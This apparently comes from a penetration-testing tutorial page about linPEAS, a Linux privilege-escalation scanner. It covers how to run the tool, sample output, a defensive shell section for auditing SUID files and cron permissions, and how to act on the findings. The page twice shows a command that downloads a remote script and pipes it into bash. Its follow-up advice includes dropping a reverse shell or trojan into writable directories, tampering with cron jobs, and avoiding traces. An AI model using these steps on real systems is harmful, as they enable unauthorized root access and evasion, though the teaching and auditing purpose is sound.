linPEAS (Linux Privilege Escalation Awesome Script) is an advanced tool for post-exploitation on Linux systems, designed to automate the process of identifying potential privilege escalation opportunities. It searches the target system for known vulnerabilities, misconfigurations, and common attack vectors that could be exploited to gain root access.
It is typically used by penetration testers and ethical hackers during the post-exploitation phase to increase access levels on compromised Linux systems. linPEAS is fast, thorough, and covers a wide range of checks, from system information and environment variables to kernel vulnerabilities and writable directories.
Quick Command Snippet
Once you’ve gained access to a Linux system, run linPEAS using the following command to check for privilege escalation vectors:
> curl -s https://yourdomain.com/tools/linpeas.sh | bash
- This will download the linPEAS script and run it in the same command, scanning the system for privilege escalation opportunities.
- The tool is simple to use and can be executed as a regular user (non-root), though it may provide more relevant results when run as root.
Overview of linPEAS Usage
How to Use linPEAS
To run linPEAS on a target system, you can either download it manually or execute it directly from the web using the command snippet provided above. Below are the steps to execute linPEAS:
- Execute linPEAS: Run the following command directly from your shell:
> curl -s https://yourdomain.com/tools/linpeas.sh | bash
- Output: linPEAS will produce a detailed output, categorized by areas that may contain privilege escalation vectors. It checks for a wide variety of weaknesses, including misconfigured SUID binaries, world-writable directories, known kernel vulnerabilities, and more.
- Analyzing Results: The results will be categorized into sections such as “SUID binaries,” “Writable directories,” and “Kernel vulnerabilities.” These are the areas you need to focus on for further exploitation or post-exploitation activities.
Important Notes:
- It’s best to run linPEAS with the least privileges possible to avoid leaving traces. For example, run it as a regular user if possible.
- It’s a good practice to execute linPEAS on different Linux distributions and versions as some issues may be specific to certain system configurations.
Example Output
After running linPEAS, you might see output like this:
[*] SUID binaries found:
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/passwd
...
[*] Writable directories found:
/var/www/html
/home/user/.ssh/
/etc/cron.d/
[*] Kernel vulnerabilities:
CVE-2021-XXXX
CVE-2020-YYYY
...
[*] Scheduled tasks:
/etc/cron.d/root
/etc/crontab
[*] Kernel Information:
Kernel version: 5.4.0-42-generic
Architecture: x86_64
...
Explanation of Output:
- SUID Binaries: These binaries allow a user to execute them with the permissions of the binary’s owner, often root. This is a common privilege escalation vector.
- Writable Directories: These directories may be used to upload malicious scripts or binaries that could allow you to escalate privileges.
- Kernel Vulnerabilities: If the system is running a vulnerable kernel, you may be able to exploit this weakness to gain root access.
- Scheduled Tasks: These may allow for privilege escalation if they are misconfigured or have weak permissions.
How to Interpret the Results
Key Sections to Focus On:
- SUID Binaries
- What It Means: SUID (Set User ID) binaries run with the permissions of the binary’s owner (often root), which can be exploited for privilege escalation.
- Next Steps: Check for misconfigured binaries. For example, try running /usr/bin/sudo or /usr/bin/passwd in a way that could elevate your privileges.
- Writable Directories
- What It Means: Directories with write permissions might allow an attacker to upload malicious files or scripts.
- Next Steps: Upload a reverse shell, malicious script, or trojan into these writable directories and execute it to escalate privileges.
- Kernel Vulnerabilities
- What It Means: The presence of known kernel vulnerabilities (listed by CVE numbers) opens the door for kernel-level exploits.
- Next Steps: Search for available exploits for these CVEs and attempt to exploit them to escalate your privileges.
- Scheduled Tasks
- What It Means: Misconfigured cron jobs or scheduled tasks with weak permissions might allow for privilege escalation.
- Next Steps: Investigate and modify scheduled tasks that you can control to gain root access.
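The "SUID binaries", "Writable directories" and "Scheduled tasks" sections above come from filesystem permission checks, which an administrator can run against a known-good baseline to confirm hardening or to spot changes after an incident. The functions below are an added example written for this page, not linPEAS code: they take the directory tree to inspect as a parameter and only list paths, never modify them.

```shell
#!/bin/sh
# Added example (not part of linPEAS): defender-side versions of three of
# the checks that linPEAS reports on. Every path is passed in as a parameter.

# Setuid files under $1 (what linPEAS lists as "SUID binaries").
# -xdev keeps the scan on one filesystem so /proc and network mounts are skipped.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# Directories under $1 that are world-writable and NOT sticky
# ("Writable directories"). Sticky world-writable dirs such as /tmp are
# expected; a non-sticky one under /etc or /var/www is a finding.
list_world_writable_dirs() {
    find "$1" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null | sort
}

# Cron files under $1 writable by group or others ("Scheduled tasks").
# Whoever can edit these controls what runs as root on a schedule, so
# anything other than 0644 root:root in /etc/cron.d deserves a look.
list_weak_cron_files() {
    find "$1" -xdev -type f \( -perm -0020 -o -perm -0002 \) 2>/dev/null | sort
}

# Setuid files present now but absent from a baseline list ($2, one path per
# line, sorted). A setuid binary that was not there at install time is one of
# the most common artefacts of a compromised host.
suid_diff() {
    list_suid "$1" | comm -13 "$2" -
}

# Typical use (assumed paths): list_suid /usr; list_world_writable_dirs /etc;
# list_weak_cron_files /etc/cron.d; suid_diff / /var/lib/suid.baseline
```

Record `list_suid /` once on a freshly built host as the baseline; a non-empty `suid_diff` afterwards is worth investigating before anyone reaches the "Next Steps" stage.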
Download linPEAS
To make it easier for your penetration testing tasks, you can download linPEAS directly from the following links:
Note: Always ensure you’re downloading linPEAS from a trusted source to avoid malicious versions of the script.
Conclusion
linPEAS is an essential tool for any post-exploitation engagement in Linux environments. It automates the process of scanning for common privilege escalation vectors and provides a comprehensive report of potential weaknesses on the target system.
Next Steps:
Always remember to conduct these activities responsibly and legally, ensuring you have authorization to test the target systems.
After executing linPEAS and reviewing the output, look for areas where privilege escalation is possible.
Leverage the discovered vulnerabilities (e.g., SUID binaries, writable directories, kernel exploits) to escalate your privileges and gain root access.